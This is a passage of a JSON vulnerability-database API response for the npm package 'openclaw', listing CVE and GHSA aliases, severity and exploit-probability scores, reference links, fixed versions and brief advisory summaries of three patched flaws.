                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01838",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00012",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01843",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02646",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44118"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3cb1a56bfc9579a0f2336f9cfa12a8a744332a19"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6xh-pqhr-v4xh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44118",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44118"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T17:21:33Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-owner-context-spoofing-via-bearer-token-header"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r6xh-pqhr-v4xh",
                    "reference_id": "GHSA-r6xh-pqhr-v4xh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r6xh-pqhr-v4xh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-44118",
                "GHSA-r6xh-pqhr-v4xh"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ry1r-br3q-2uaw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89294?format=api",
            "vulnerability_id": "VCID-s3wz-3yzf-ybhz",
            "summary": "OpenClaw: Voice-call Plivo replay mutates in-process callback origin before replay rejection\n## Summary\nVoice-call Plivo replay mutates in-process callback origin before replay rejection\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: v2026.3.28 can still mutate Plivo callback origin before replay rejection, but this needs a captured valid callback for a live call so medium is overstated.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b` — 2026-03-31T19:50:35+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41337",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11472",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11506",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11508",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41337"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41337",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41337"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-89r3-6x4j-v7wf",
                    "reference_id": "GHSA-89r3-6x4j-v7wf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-89r3-6x4j-v7wf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41337",
                "GHSA-89r3-6x4j-v7wf"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s3wz-3yzf-ybhz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91442?format=api",
            "vulnerability_id": "VCID-s4s8-8qea-q3fd",
            "summary": "OpenClaw: Bonjour/DNS-SD TXT metadata steers CLI routing after failed service resolution\n## Summary\nBonjour and DNS-SD TXT metadata could still steer CLI routing even when actual service resolution failed, allowing unresolved hints to influence the chosen target.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `deecf68b59a9b7eea978e40fd3c2fe543087b569`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/bonjour-discovery.ts now resolves and returns only concrete endpoints instead of falling back to unresolved TXT host and port hints.\n- src/cli/gateway-cli/discover.ts consumes only the fail-closed resolved endpoint path.\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35659",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00688",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "7e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00687",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35659"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35659",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35659"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rvqr-hrcc-j9vv",
                    "reference_id": "GHSA-rvqr-hrcc-j9vv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rvqr-hrcc-j9vv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
